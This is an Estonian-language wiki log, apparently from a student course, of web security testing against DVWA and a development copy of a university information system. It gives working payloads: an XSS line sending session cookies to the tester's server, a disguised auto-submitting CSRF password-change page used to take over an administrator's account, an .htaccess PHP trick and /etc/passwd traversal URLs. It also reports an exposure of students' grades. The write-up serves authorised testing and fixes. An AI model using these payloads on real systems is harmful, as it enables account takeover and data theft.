Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filme&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploaditud&lt;br /&gt;
Sellises kohas võiks olla süsteem tehtud whitelisti põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&amp;lt;br&amp;gt;Näiteks sellised failid ja kõik ülejäänud oleksid keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
